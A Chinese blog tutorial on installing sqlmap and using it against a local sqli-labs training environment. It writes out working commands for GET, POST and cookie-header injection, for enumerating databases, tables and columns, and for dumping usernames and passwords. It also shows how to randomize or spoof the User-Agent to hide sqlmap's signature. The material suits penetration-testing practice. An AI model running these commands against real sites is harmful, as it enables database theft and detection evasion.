当前位置: 首页 > backend >正文

Sqlmap工具下载及使用

backend 2025/7/14 5:30:18

文章目录

  • 一、Sqlmap
  • 二、下载
  • 三、使用
    • A.注入GET型
    • B.注入POST型
    • C.注入head头

一、Sqlmap

sqlmap是一款开源的自动化SQL注入测试工具,主要用于检测和利用Web应用程序中的SQL注入漏洞。它支持多种数据库类型(如MySQL、Oracle、SQL Server等),能自动识别注入点,并通过多种技术手段获取数据库信息,包括表结构、数据内容,甚至能执行操作系统命令等。其操作相对简便,通过命令行参数配置目标URL、请求方式等信息,即可自动完成注入测试流程,广泛应用于网络安全渗透测试和漏洞评估场景。

二、下载

  • 官网:https://sqlmap.org/

  • github地址:https://github.com/sqlmapproject/sqlmap

  • 国内可下载地址:https://gitee.com/yijingsec/sqlmap

三、使用

  1. 进入sqlmap目录
    在这里插入图片描述
  2. 在路径输入cmd
    在这里插入图片描述
  3. 输入conda env list,查看环境。
    在这里插入图片描述
  4. 根据拥有的环境输入以下命令,出现如图所示界面,即配置成功。
    在这里插入图片描述

A.注入GET型

  1. url里只有一个参数(引号可不加)

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1”

在这里插入图片描述

  1. url里有两个参数(加引号)

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1&page=10” -p page

在这里插入图片描述

  1. 自动化测试:--batch

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch

在这里插入图片描述

  1. 获取库名:--dbs

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch -dbs

在这里插入图片描述

  1. 获取表名:--tables,指定数据库:-D

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch -tables -D security

在这里插入图片描述

  1. 获取列名:--columns,指定数据表:-T

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch -columns -D security -T users

在这里插入图片描述

  1. 获取数据(拖库,实战中禁用慎用):--dump,指定列名:-C

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch -D security -T users -C id,username,password -dump

在这里插入图片描述

  1. GET型注入ua头会带有明显的Sqlmap标识

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -proxy=http://127.0.0.1:8080 -batch -D security -T users -C id,username,password -dump

在这里插入图片描述

  • 随机使用User-agent头:–random-agent

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -proxy=http://127.0.0.1:8080 -random-agent -batch -D security -T users -C id,username,password -dump

在这里插入图片描述

  • 自定义使用ua头

python sqlmap.py -u http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1 --proxy=http://127.0.0.1:8080 --user-agent=“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0” -batch -D security -T users -C id,username,password -dump

在这里插入图片描述

B.注入POST型

  1. 打开第11关并打开代理,随意输入数字后点击提交。
    在这里插入图片描述

  2. 找到对应数据包,右击复制到文件并保存。
    在这里插入图片描述
    在这里插入图片描述

  3. 测试文件是否存在漏洞。
    在这里插入图片描述

C.注入head头

sqlmap默认测试所有的get和post参数,level值>2时也会测试cookie头的值,>=3时也会测试User-Agent和Referer头的值,最高可到5。

python sqlmap.py -u http://127.0.0.1/sqli-labs/sqli-labs-master/Less-20/in dex.php --cookie “uname=Dump” --level 2 --dbs

http://www.xdnf.cn/news/15319.html

相关文章:

  • 【算法】贪心算法入门
  • 算法学习笔记:19.牛顿迭代法——从原理到实战,涵盖 LeetCode 与考研 408 例题
  • 【SCI 4区推荐】《Journal of Visual Communication and Image Representation》
  • 代码随想录|图论|14有向图的完全可达性
  • 集训Demo1
  • CVPR2025 Mamba系列
  • JAVA--双亲委派机制
  • 维基艺术图片: python + scrapy 爬取图片
  • Linux系统中部署Redis详解
  • 算法练习6-大数乘法(高精度乘法)
  • RocketMQ-
  • 【字符串移位包含问题】2022-8-7
  • Opencv---深度学习开发
  • 单细胞入门(1)——介绍
  • 电商订单数据分析全流程:从数据处理到可视化洞察
  • 【PTA数据结构 | C语言版】车厢重排
  • Geant4 安装---Ubuntu
  • 【深度剖析】致力“四个最”的君乐宝数字化转型(下篇:转型成效5-打造数字化生存能力探索可持续发展路径)
  • 26. 删除有序数组中的重复项
  • 【MySQL笔记】事务的ACID特性与隔离级别
  • 详细理解向量叉积
  • 二分搜索 (左程云)
  • 【C/C++】编译期计算能力概述
  • uniapp弹出手机键盘,布局被顶飞,导致页面混乱问题
  • 使用Pycharm集成开发工具远程调试部署在虚拟机上的flask项目:超级详细的完整指南
  • Rust Web 全栈开发(六):在 Web 项目中使用 MySQL 数据库
  • Transforms
  • 单向链表反转 如何实现
  • JVM的垃圾回收算法和多种GC算法
  • Redis面试精讲 Day 1:Redis核心特性与应用场景